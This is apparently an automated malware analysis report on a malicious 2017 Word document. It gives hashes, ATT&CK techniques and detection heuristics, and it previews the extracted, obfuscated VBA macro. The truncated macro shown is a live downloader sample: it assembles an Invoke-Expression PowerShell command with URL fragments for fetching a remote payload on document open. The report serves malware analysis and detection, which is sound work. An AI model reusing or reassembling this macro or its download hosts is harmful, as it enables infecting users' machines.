Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eb0373cb1c3d2cc1…

MALICIOUS

Office (OLE)

176.5 KB Created: 2017-11-30 21:19:00 Authoring application: Microsoft Office Word First seen: 2017-12-08
MD5: 0e06807ed053dedb0db492634047e2ef SHA-1: fc98b44fa5c407cf3c61fea0abe688fa54cfce82 SHA-256: eb0373cb1c3d2cc15ea5ab85c5d27822a1fc69a3131fbce6c964d7551876f94e
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicating an attempt to execute external code. The obfuscated script attempts to download a payload from the URL http://www.latoaMh+aMh.ru/aMh+aMhGToaMh+aMhgfl/,aMh+ which is highly suspicious. The presence of AutoOpen and Shell() calls strongly suggests a downloader or dropper functionality.

Heuristics 7

  • ClamAV: Doc.Macro.Obfuscation-6387400-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.celaMh+aMhebt In document text (OLE body)
    • http://www.latoaMh+aMh.ru/aMh+aMhGToaMh+aMhgfl/,aMh+In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 90074 bytes
SHA-256: 96757ec874e26ff5769079ea97f72cd7bfc8d937eab0cd2f70fa916bca816889
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mNOGVQchCh"
Function bptCdwDd()
rhwTqjNj = Array(StrReverse("PmBIcBO"), StrReverse("jSuEAWJiZ"), StrReverse("OZGLcplaNUWq"), StrReverse("LYjwSaA"), StrReverse("fEJVTZXjZJkdn"), StrReverse("UwDKLWBoutsLij"), StrReverse("YrEZsjVzp"), StrReverse("QOrnLlNS"))
WawDR = Mid("Mndom;aM'+'h+aMhYPaah3+ah3Mh'+'+aMhTbcd = aMah3+ah'+'3h+aMBfiwtjbPKvJ5AD", 2, 57)
WzuKPvZjU = Array(StrReverse("zfEVsFldErV"), StrReverse("hjlzWhhVkX"), StrReverse("mjiAKVmK"), StrReverse("AcuRWmk"), StrReverse("FhAvsfPNI"), StrReverse("KJnlscXRm"), StrReverse("FbISjTYEl"), StrReverse("bjwSPCWMt"))
SOEZja = Array(StrReverse("EmuHOdoqJ"), StrReverse("cHqrSBSjD"), StrReverse("OwzNBvIJBjIftV"), StrReverse("idjqvEsLhNB"), StrReverse("WZmsFJYzFm"), StrReverse("GSUipaHwOUPn"), StrReverse("jqHqVnRAAV"), StrReverse("kOqCVVWWrwcX"))
hZRBZNNpdA = Array(StrReverse("okqBXtSJPHOdr"), StrReverse("VhptSitmkCzDio"), StrReverse("bSaTEjh"), StrReverse("NFDaXqoKZZ"), StrReverse("jYwitFwC"), StrReverse("oETKdIn"), StrReverse("oKnRoMcoPEWwv"), StrReverse("YiZFccojOGdhj"))
pIcVRMoX = Mid("HjA7LcYCaaMh+aMhkaMh+aMh;aMh+aMh}catcaMh+aMhh{wrah3+ah3i'+'te-aMh+aMhhoah3+ah3saMh+aMht YaMh+aMhah3+ah3PT_.Exception.Message;}ah3+'+'ah3}aMh) -crEPlaC'+'e  aM6afRFDWm", 9, 150)
JnkBanmUz = Array(StrReverse("ZCkZQnFHmNJ"), StrReverse("ChdRVjFzj"), StrReverse("ajEaswsvbGSjQS"), StrReverse("sjNQdwB"), StrReverse("nTnsEWPWarfc"), StrReverse("UpuGOrm"), StrReverse("wVRLOdz"), StrReverse("jFvZCQHFFnYLj"))
wUzqodUlWnV = Array(StrReverse("mswOCAVP"), StrReverse("ruMVqiBbGEwf"), StrReverse("lYjLAHvhnHfTB"), StrReverse("HItvVJriKP"), StrReverse("zCNiXckd"), StrReverse("HXhrzOTFDmhBoH"), StrReverse("TMJaVwCNRDCFiC"), StrReverse("fuqEOjaCv"))
EaFjw = Array(StrReverse("IFbFJuFNbE"), StrReverse("YuzkZLWrSrR"), StrReverse("jEmUDPEwqo"), StrReverse("qPibjHXTIfHX"), StrReverse("VoASBzkdqf"), StrReverse("AXZBzWIlkLIUrk"), StrReverse("kuXJtZjPzPPmu"), StrReverse("DEzkoaMhWWlXV"))
tcdXCztPWRd = Mid("Rz5HXRduasaMh+aMh);baMh+aMhreARTbrcWcc8O2Ct5G", 8, 22)
PKsjvjd = Array(StrReverse("qmfXhGIu"), StrReverse("KKSJHAFKQn"), StrReverse("JkCmHnLktJtKOT"), StrReverse("KWpjztKPsFN"), StrReverse("iDJZJOzwGksQ"), StrReverse("uYBJQADqcqiUjq"), StrReverse("wVKhtCc"), StrReverse("jkkvQVZadYpC"))
nniKfIF = Array(StrReverse("KMTJhONpGhlUU"), StrReverse("amikNsjH"), StrReverse("kCJaDYBX"), StrReverse("EtEmvFEffN"), StrReverse("SwTGFGknAJcHDD"), StrReverse("GYoKREJPQbCo"), StrReverse("cjiMSJqmjDVwo"), StrReverse("WNcmBiNzj"))
wuJUkrWdK = Array(StrReverse("ThBojcoXnOZ"), StrReverse("kPmQmzGbEi"), StrReverse("SoNSVWWOhSF"), StrReverse("COnKQvoMas"), StrReverse("TwXGfiLp"), StrReverse("kCizTKTBQz"), StrReverse("EfukBzppfQWEZ"), StrReverse("tVzPrjVdfkz"))
KqmJiwYR = Mid("b'h+aMhg.ua/xWRfHaMh+aMhlaMh+aMh/,aMhah3+a'+'h3+aMhhttp://www.celaMh+aMhebt'+'weets.'+'netaMh+'+'aMh/eaMh+aMhdaMh+aMhl/,'+'htah3+a'+'h3tpEQ73IKNGChnEdz8jiiqPh7Um4GR6tc7q", 2, 136)
jYMpcP = Array(StrReverse("VwtJiCfCStLUb"), StrReverse("ouNwWUSOd"), StrReverse("mCooBFdcAqrWP"), StrReverse("DhYTduCClMwH"), StrReverse("QcLYHSDWjO"), StrReverse("AMQiUkYRijspw"), StrReverse("kiokQbqtkMzoSj"), StrReverse("MKWShSR"))
jSVmEa = Array(StrReverse("nqGcmwbBHoC"), StrReverse("EjtVJJOzJXapV"), StrReverse("ZTWazKkVMwjD"), StrReverse("adYUESKLKnA"), StrReverse("WWCWPPQHAW"), StrReverse("ijpsDiTu"), StrReverse("GfoTlDWWKbOf"), StrReverse("GcohzwjSvc"))
FKWkzM = Array(StrReverse("EFNpwIOU"), StrReverse("DZGdKEkjZYPWj"), StrReverse("zrpHjnuj"), StrReverse("aTfjmrfpIB"), StrReverse("SUFVizVVfBDjXt"), StrReverse("zHBhhsWBf"), StrReverse("fVwouiGV"), StrReverse("timTchRYBWXj"))
aFucTHVK = Mid("9lAaiPlkzPDwGJwBG1vcvtJ1bOInvOkE-EXPRessIOn((('(ah3& ( vNpvErBOSepNAnjPjETkAb", 27, 40)
uHhUrzE = Array(StrReverse("VtnOaGc"), StrReverse("sONriilMtuwZI"), StrReverse("IaNEVjXLTKC"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.